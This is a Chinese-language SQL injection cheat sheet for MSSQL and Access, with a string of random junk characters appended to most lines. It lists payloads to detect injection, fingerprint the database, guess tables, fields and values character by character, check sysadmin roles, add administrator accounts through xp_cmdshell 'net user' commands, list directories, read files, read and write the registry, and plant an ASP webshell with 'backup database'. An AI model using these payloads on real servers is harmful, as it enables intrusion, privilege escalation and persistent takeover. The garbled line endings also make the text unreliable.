1.判断是否有注入;and 1=1 ;and 1=2 d79N-O-
2.初步判断是否是mssql ;and user>0 %?tq;~|]Q
R2^iSl%pj
3.注入参数是字符'and [查询条件] and ''=' k/`i6%F#m
<MZi<Z`
4.搜索时没过滤参数的'and [查询条件] and '%25'=' 'U)8rR
:m`/Q_y"
5.判断数据库系统 gue(C(~.k_
1L[S*X
;and (select count(*) from sysobjects)>0 mssql MW@ DXbKVl
XVUf,N,
;and (select count(*) from msysobjects)>0 access $L{7%]7QC
J?jeYW
:R+],m il
\C/z%Hf7-
6.猜数据库 ;and (select Count(*) from [数据库名])>0 g_ M-F
6E+=Xi
7.猜字段 ;and (select Count(字段名) from 数据库名)>0 &BgU:R,
5u,sx664
8.猜字段中记录长度 ;and (select top 1 len(字段名) from 数据库名)>0 R;THA!
JSjYC0e
9.(1)猜字段的ascii值(access) q|{tQJfYg
k>{-[X,/OV
;and (select top 1 asc(mid(字段名,1,1)) from 数据库名)>0 Z=9dMND
.cR*P<3O
(2)猜字段的ascii值(mssql) 60PYCqWc
BX$hAQ(6Q
;and (select top 1 unicode(substring(字段名,1,1)) from 数据库名)>0 `Cj,HI_/*
`^%GN8d}nm
10.测试权限结构(mssql) "6V_/u5M;=
hEOJb
@:R
$FCw$ +w
^Kw(&v
;and 1=(select IS_SRVROLEMEMBER('sysadmin'));-- /=M.-MU2
v MWC(m
;and 1=(select IS_SRVROLEMEMBER('serveradmin'));-- faVS2TN4
s^PmnFR
;and 1=(select IS_SRVROLEMEMBER('setupadmin'));-- Y'_ D<Mp
g{a d0.y,
;and 1=(select IS_SRVROLEMEMBER('securityadmin'));-- {Gkn_h-^
&7F&}7*c
;and 1=(select IS_SRVROLEMEMBER('diskadmin'));-- \X opU"
z(UX't (q
;and 1=(select IS_SRVROLEMEMBER('bulkadmin'));-- n4*'B*
-A@U0=o
;and 1=(select IS_MEMBER('db_owner'));-- [+DNM
2A
rk|a'&
CjZ6NAHc
'#f?#(
11.添加mssql和系统的帐户 ~~dfpW _"
JS2!)aqc
;exec master.dbo.sp_addlogin username;-- {G.{ad
;exec master.dbo.sp_password null,username,password;-- 6QptKXu7
EG1x
;exec master.dbo.sp_addsrvrolemember sysadmin username;-- s}!"a8hU`
*2:Yf7rvI+
;exec master.dbo.xp_cmdshell 'net user username password mt .,4
4`0;^K.
/workstations:*/times:all/passwordchg:yes /passwordreq:yes /active:yes /add';-- +-k`x0v
/O"0L/hc^
;exec master.dbo.xp_cmdshell 'net user username password /add';-- gT7I9 (x!W
$y4M#yv
;exec master.dbo.xp_cmdshell 'net localgroup administrators username /add';-- JOHp?3 "4
Bcm=G""
EEg O
9oD#t~+F4
12.(1)遍历目录 1
'%-y
_^3@PM>
;create table dirs(paths varchar(100), id int) KqY>4tb
|Kn^w4mN
;insert dirs exec master.dbo.xp_dirtree 'c:\' cFxSDTR
[r~~=b7*[
;and (select top 1 paths from dirs)>0 G[B*TM6$
Faw. GU
;and (select top 1 paths from dirs where paths not in('上步得到的paths'))>) Q
}8C
nTQ (JDf
&`5 :GLV
lc-*8eS
(2)遍历目录 +{bh
gU*I;s>
;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));-- > hesxC!
;insert temp exec master.dbo.xp_availablemedia;-- 获得当前所有驱动器 CY\mU_.b
vev8l\
;insert into temp(id) exec master.dbo.xp_subdirs 'c:\';-- 获得子目录列表 ,XP@ pi
'|+=B u
;insert into temp(id,num1) exec master.dbo.xp_dirtree 'c:\';-- 获得所有子目录的目录树构 .Px,=56$X
^f"&}%" M
;insert into temp(id) exec master.dbo.xp_cmdshell 'type c:\web\index.asp';-- 查看文件的内容 6P6Jx;
k dUc&
QD6Z=>?S
l>33z_H^
13.mssql中的存储过程 ";58B}ki
$o::PDQ?
xp_regenumvalues 注册表根键, 子键 w7[0
zkvH=wL
;exec xp_regenumvalues 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Run' 以多个记录集方式返回所有键值 gGD]t;<u
[/n'@cjNZ
xp_regread 根键,子键,键值名 _c,&\ wl$
uof0Oc.
;exec xp_regread yl|R:/2V
PK9Qm'W b
'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','CommonFilesDir' 返回制定键的值 0honHP
nFSG<#x\
xp_regwrite 根键,子键, 值名, 值类型, 值 5"]aZMua
DwQp$l'NfW
值类型有2种REG_SZ 表示字符型,REG_DWORD 表示整型 HJ(=?TU
|O'Hh7
;exec xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName','reg_sz','hello' 写入注册表 ec,z6v^9
yA457'R1
xp_regdeletevalue 根键,子键,值名 \>_eEZ5
<kk'v'GW@
exec xp_regdeletevalue 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName' 删除某个值 72%
{Wh/
eq7C]i
rH
xp_regdeletekey 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Testkey' 删除键,包括该键下所有值 W>UjUq);
8cequAD
g!z8oPT
J78Qj[v
14.mssql的backup创建webshell }:tAKO=+
1Z=;Uy\
use model zbdOCfA;
UeC 81*XZ
create table cmd(str image); uV#-8a5!
</~1p~=hAt
insert into cmd(str) values (''); __Vg/C!W
XWJ0=t&}
backup database model to disk='c:\l.asp'; _y.mpX&
Ni/|C19Z
jAsh
vQE` c@^{
15.mssql内置函数 GWVEIZ
qsQ]M^@>
;and (select @@version)>0 获得Windows的版本号 F\I5fNs@
$XtV8
;and user_name()='dbo' 判断当前系统的连接用户是不是sa GXGN;,7EV
dICnB:SSB
;and (select user_name())>0 爆当前系统的连接用户 )I^)*(}
zV9
=
;and (select db_name())>0 得到当前连接的数据库 w?*'vF_2:#
4"rb&$E
7 B4w.P,B
m3 x!*9h
16.简洁的webshell @|JPE%T
z0FR33-
use model L2do2_
1ZGQhjcx
create table cmd(str image); mJU>f-l
k|)^!BdO
insert into cmd(str) values (''); [j]}$fFe
U]1>?,Nk'3
backup database model to disk='g:\wwwtest\l.asp';